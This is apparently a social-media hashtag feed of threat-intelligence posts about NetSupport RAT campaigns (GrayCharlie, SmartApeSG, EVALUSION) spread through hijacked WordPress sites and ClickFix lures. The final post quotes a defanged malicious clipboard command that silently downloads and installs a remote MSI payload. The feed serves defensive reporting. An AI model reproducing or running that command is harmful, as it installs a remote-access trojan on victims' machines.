OTX BotFeb 24

GrayCharlie Hijacks WordPress to Deploy NetSupport RAT

GrayCharlie is a threat actor compromising WordPress sites to deliver
NetSupport RAT.

Pulse ID: 699e1a3549ab2f017a665928
Pulse Link: https://otx.alienvault.com/pulse/699e1a3549ab2f017a665928
Pulse Author: cryptocti
Created: 2026-02-24 21:37:57

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #RAT #RDP #Word #Wordpress #bot #cryptocti

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange
OTX BotFeb 18

Law Firm Sites Hijacked in Suspected Supply-Chain Attack

GrayCharlie, a threat actor active since mid-2023, compromises WordPress sites to inject links redirecting visitors to NetSupport RAT payloads via fake browser updates or ClickFix mechanisms. These infections often lead to Stealc and SectopRAT deployments. The group's infrastructure is primarily linked to MivoCloud and HZ Hosting Ltd. A cluster of US law firm sites was compromised around November 2025, possibly through a supply-chain attack. GrayCharlie uses two main attack chains: one involving fake browser updates and another using ClickFix-style lures. The group's objectives appear to focus on data theft and financial gain, with potential access selling to other threat actors.

Pulse ID: 6995e8969f9d1c390db3fa4e
Pulse Link: https://otx.alienvault.com/pulse/6995e8969f9d1c390db3fa4e
Pulse Author: AlienVault
Created: 2026-02-18 16:28:06

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #Cloud #CyberSecurity #DataTheft #FakeBrowser #InfoSec #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #RAT #RDP #SMS #Stealc #Word #Wordpress #bot #AlienVault

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange
BradDec 29

2025-12-29 (Monday): #ClickFix page leads to #NetSupportRAT infection.

Details at www.malware-traffic-analysis.net/2025/12/29/index.html

Of note, this is not from the usual ClickFix campaigns that I track. While #SmartApeSG has often pushed #NetSupport #RAT, this is a completely different vector for the initial URL.

The initial sites.google[.]com URLs for this campaign are sent via email. But I don't have an example for this particular infection chain.

Hackread.comDec 8

New JS#SMUGGLER malware campaign delivers #NetSupportRAT through compromised websites – hackers get full remote control of Windows machines.

Read: https://hackread.com/jssmuggler-netsupport-rat-infected-sites/

#JSsmuggler #Malware #Cybersecurity #Windows

New JS#SMUGGLER Campaign Drops NetSupport RAT Through Infected Sites

Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread

TechNaduNov 18

Researchers are tracking a new ClickFix campaign called EVALUSION, delivering Amatera Stealer and NetSupport RAT.

The chain begins with Run-dialog execution during fake CAPTCHA checks, followed by mshta.exe → PowerShell → PureCrypter → DLL injection into MSBuild.exe.

Amatera includes advanced evasion and broad data-harvesting features. NetSupport RAT is deployed only when valuable data is detected.
Related phishing activity involves XWorm, Cephas kits, SmartApeSG, and Tycoon 2FA.

Thoughts on this growing reliance on execution through supposedly “trusted” system tools?

💬 Share your perspective
👍 Follow us for more clear, unbiased threat reporting

#Infosec #CyberSecurity #ClickFix #AmateraStealer #NetSupportRAT #MalwareAnalysis #ThreatIntel #MaaS #PhishingKits #SecurityResearch

SANS Internet Storm Center - SANS.edu - Go Sentinels!Nov 18
ISC diary: #SmartApeSG campaign uses #ClickFix page to push #NetSupportRAT https://isc.sans.edu/diary/32474
maniabelNov 17

Neue EVALUSION‑ClickFix‑Kampagne:
Amatera‑Stealer und NetSupport‑RAT werden verbreitet

Cyber‑Security‑Forscher von eSentire haben eine EVALUSION genannte Malware‑Kampagne entdeckt, die das mittlerweile weit verbreitete ClickFix‑Social‑Engineering‑Muster nutzt, um den Amatera Stealer und das NetSupport RAT zu installieren.

Mehr: https://maniabel.work/archiv/265

#ClickFix #AmateraStealer #NetSupportRAT, infosec #infosecnews #BeDiS

Neue EVALUSION‑ClickFix‑Kampagne – maniabel.work

Entdecken Sie, was Sie für die Sicherheit und den Schutz Ihrer Daten selbst tun können. <meta charset=

The Threat CodexNov 17
EVALUSION Campaign Delivers Amatera Stealer and NetSupport RAT
#AmateraStealer #NetSupportRAT
https://www.esentire.com/blog/evalusion-campaign-delivers-amatera-stealer-and-netsupport-rat
EVALUSION Campaign Delivers Amatera Stealer and NetSupport RAT

Learn more about the EVALUSION campaign delivering the Amatera infostealer malware and NetSupport RAT, and get security recommendations from eSentire’s…

eSentire
The Threat CodexNov 13
SmartApeSG campaign uses ClickFix page to push NetSupport RAT
#SmartApeSG #NetSupportRAT
https://isc.sans.edu/diary/32474
BradSep 22

2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.

While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.

#clipboardhijacking Script injected into clipboard:

msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn

The downloaded file is an MSI for #NetSupportRAT

https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a